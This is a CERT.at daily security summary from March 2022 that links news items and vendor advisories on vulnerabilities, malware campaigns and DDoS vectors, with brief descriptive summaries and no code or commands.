Tageszusammenfassung - 08.03.2022

End-of-Day report

Timeframe: Montag 07-03-2022 18:00 - Dienstag 08-03-2022 18:00 Handler: Robert Waldner Co-Handler: Thomas Pribitzer

News

Fernverwaltung mit Sicherheitslücke gefährdet medizinische Geräte

Viele medizinische IoT-Geräte enthalten Fernverwaltungssoftware von Axeda/PTC. Sicherheitslücken ermöglichen Angreifern das Einschleusen von Schadcode.

https://heise.de/-6542436

Stecker zum Stromsparen auf -getecotex.com- ist Betrug

Auf getecotex.com wird ein Stecker zum Stromsparen angeboten. Für 59 Euro kann angeblich der Stromfluss stabilisiert, hochfrequenter Strom entfernt und die Energierechnung reduziert werden. Vorsicht: Diese Versprechen sind frei erfunden - ein solches Gerät existiert nicht. Sie werden betrogen und verlieren Ihr Geld!

https://www.watchlist-internet.at/news/stecker-zum-stromsparen-auf-getecotexcom-ist-betrug/

CVE-2022-26143: TP240PhoneHome Reflection/Amplification DDoS Attack Vector

A new reflection/amplification distributed denial of service (DDoS) vector with a record-breaking potential amplification ratio of 4,294,967,296:1 has been abused by attackers in the wild to launch multiple high-impact DDoS attacks. Attacks have been observed on broadband access ISPs, financial institutions, logistics companies, gaming companies, and organizations in other vertical markets. Security researchers, network operators, and security vendors observed these attacks and formed a task force to investigate the new DDoS vector and provide mitigation guidance. Approximately 2,600 Mitel MiCollab and MiVoice Business Express collaboration systems acting as PBX-to-Internet gateways were incorrectly deployed with an abusable system test facility exposed to the public Internet.

https://www.shadowserver.org/news/cve-2022-26143-tp240phonehome-reflection-amplification-ddos-attack-vector/

Emotet growing slowly but steadily since November resurgence

The notorious Emotet botnet is still being distributed steadily in the wild, having now infected 92,000 systems in 172 countries.

https://www.bleepingcomputer.com/news/security/emotet-growing-slowly-but-steadily-since-november-resurgence/

An attackers toolchest: Living off the land

If you-ve been keeping up with the information security world, you-ve certainly heard that recent ransomware attacks and other advanced persistent threats are sometimes using special kind of tools. But for the most part, the tools will be very familiar to you.

https://www.gdatasoftware.com/blog/2022/02/37248-living-off-the-land

Androids March 2022 Security Updates Patch 39 Vulnerabilities

Google this week announced the release of patches for 39 vulnerabilities as part of the March 2022 security update for Android. The most serious vulnerability is CVE-2021-39708, a remotely exploitable elevation of privilege issue identified in the System component.

https://www.securityweek.com/androids-march-2022-security-updates-patch-39-vulnerabilities

Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities

We disclosed several GKE Autopilot vulnerabilities and attack techniques to Google. The issues are now fixed - we provide a technical analysis.

https://unit42.paloaltonetworks.com/gke-autopilot-vulnerabilities/

Phishing attempts from FancyBear and Ghostwriter stepping up says Google

Google TAG also sees Chinese Mustang Panda going after Europeans and DDoS attempts against Ukrainian targets.

https://www.zdnet.com/article/phishing-attempts-from-fancybear-and-ghostwriter-stepping-up-says-google/

Daxin Backdoor: In-Depth Analysis, Part One

In the first of a two-part series of blogs, we will delve deeper into Daxin, examining the driver initialization, networking, key exchange, and backdoor functionality of the malware.

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-malware-espionage-analysis

FBI Releases Indicators of Compromise for RagnarLocker Ransomware

The Federal Bureau of Investigation (FBI) has released a Flash report detailing indicators of compromise (IOCs) associated with ransomware attacks by RagnarLocker, a group of a ransomware actors targeting critical infrastructure sectors. CISA encourages users and administrators to review the IOCs and technical details in FBI Flash CU-000163-MW and apply the recommended mitigations.

https://us-cert.cisa.gov/ncas/current-activity/2022/03/08/fbi-releases-indicators-compromise-ragnarlocker-ransomware

Ukraine-Krise - Aktuelle Informationen

08.03.2022 16:40 Bereich "Indirekte Angriffsfläche" erweitert

https://cert.at/de/aktuelles/2022/3/ukraine-krise-aktuelle-informationen

Vulnerabilities

Jetzt patchen! Kritische Sicherheitslecks in APC Smart-UPS

In den APC Smart-UPS von Schneider Electric könnten Angreifer Sicherheitslücken ausnutzen, um Schadcode einzuschleusen oder die Geräte außer Funktion zu setzen.

https://heise.de/-6542950

Security updates for Tuesday

Security updates have been issued by Debian (gif2apng and twisted), Mageia (golang, kernel, and webmin), openSUSE (chromium, cyrus-sasl, and opera), Red Hat (virt:rhel and virt-devel:rhel), Slackware (mozilla), SUSE (cyrus-sasl), and Ubuntu (glibc and redis).

https://lwn.net/Articles/887159/

AVEVA System Platform

This advisory contains mitigations for a Cleartext Storage of Sensitive Information in Memory vulnerability in the AVEVA System Platform, a software management product.

https://us-cert.cisa.gov/ics/advisories/icsa-22-067-02

Sensormatic PowerManage (Update A)

This update advisory is a follow-up to the original advisory titled ICSA-22-034-01 Sensormatic PowerManage that was published February 3, 2022, on the ICS webpage on www.cisa.gov/uscert. This advisory contains mitigations for an Improper Input Validation vulnerability in the Sensormatic PowerManage operating platform. Update A (Part 1 of 1): Upgrade PowerManage to Version 4.10

https://us-cert.cisa.gov/ics/advisories/icsa-22-034-01

D-LINK Router: Schwachstelle ermöglicht Denial of Service

https://www.cert-bund.de/advisoryshort/CB-K22-0268

Citrix Federated Authentication Service (FAS) Security Update

https://support.citrix.com/article/CTX341587

Security Bulletin: Vulnerability in IBM Guardium Data Encryption (GDE) (CVE-2021-20414)

https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-guardium-data-encryption-gde-cve-2021-20414-2/

Security Bulletin: Multiple security vulnerability are addressed in monthly security fix for IBM Cloud Pak for Business Automation February 2022

https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnerability-are-addressed-in-monthly-security-fix-for-ibm-cloud-pak-for-business-automation-february-2022-2/

Security Bulletin: IBM Maximo Asset Management is vulnerable to weak password requirements ( CVE-2021-38935 )

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-management-is-vulnerable-to-weak-password-requirements-cve-2021-38935-2/

Security Bulletin: IBM Cloud Pak System is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-45046, CVE-2021-44228)

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-pak-system-is-vulnerable-to-arbitrary-code-execution-due-to-apache-log4j-cve-2021-45046-cve-2021-44228-2/

Security Bulletin: IBM Security Directory Integrator has upgraded log4j

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-directory-integrator-has-upgraded-log4j/

Security Bulletin: Multiple Vulnerabilities in WebSphere Application Server Liberty affect IBM Virtualization Engine TS7700 (CVE-2021-35517, CVE-2021-36090)

https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-websphere-application-server-liberty-affect-ibm-virtualization-engine-ts7700-cve-2021-35517-cve-2021-36090-2/

Security Bulletin: A vulnerability has been identified in IBM WebSphere Liberty shipped with IBM Tivoli Netcool Impact (CVE-2021-29842)

https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-has-been-identified-in-ibm-websphere-liberty-shipped-with-ibm-tivoli-netcool-impact-cve-2021-29842/

Security Bulletin: IBM Spectrum Control is vulnerable to multiple weaknesses related to IBM Dojo (CVE-2021-234550), Java SE (CVE-2021-35578), IBM WebSphere Application Server - Liberty (CVE-2021-39031), Apache Log4j (CVE-2021-44832) and Gson

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-spectrum-control-is-vulnerable-to-multiple-weaknesses-related-to-ibm-dojo-cve-2021-234550-java-se-cve-2021-35578-ibm-websphere-application-server-liberty-cve-2021-39031-2/

SSA-250085: Multiple Vulnerabilities in SINEC NMS

https://cert-portal.siemens.com/productcert/txt/ssa-250085.txt

SSA-223353: Multiple Vulnerabilities in Nucleus RTOS based SIMOTICS CONNECT 400

https://cert-portal.siemens.com/productcert/txt/ssa-223353.txt

SSA-166747: Scene File Parsing Vulnerability in Simcenter STAR-CCM+ Viewer before V2022.1

https://cert-portal.siemens.com/productcert/txt/ssa-166747.txt

SSA-594438: Remote Code Execution and Denial-of-Service Vulnerability in multiple RUGGEDCOM ROX products

https://cert-portal.siemens.com/productcert/txt/ssa-594438.txt

SSA-562051: Cross-Site Scripting Vulnerability in Polarion ALM

https://cert-portal.siemens.com/productcert/txt/ssa-562051.txt

SSA-415938: Improper Access Control Vulnerability in Mendix

https://cert-portal.siemens.com/productcert/txt/ssa-415938.txt

SSA-406691: Buffer Vulnerabilities in DHCP function of RUGGEDCOM ROX products

https://cert-portal.siemens.com/productcert/txt/ssa-406691.txt

SSA-389290: Third-Party Component Vulnerabilities in SINEC INS

https://cert-portal.siemens.com/productcert/txt/ssa-389290.txt

SSA-337210: Privilege Escalation Vulnerability in SINUMERIK MC

https://cert-portal.siemens.com/productcert/txt/ssa-337210.txt

SSA-256353: Third-Party Component Vulnerabilities in RUGGEDCOM ROS

https://cert-portal.siemens.com/productcert/txt/ssa-256353.txt

SSA-252466: Multiple Vulnerabilities in Climatix POL909 (AWM and AWB)

https://cert-portal.siemens.com/productcert/txt/ssa-252466.txt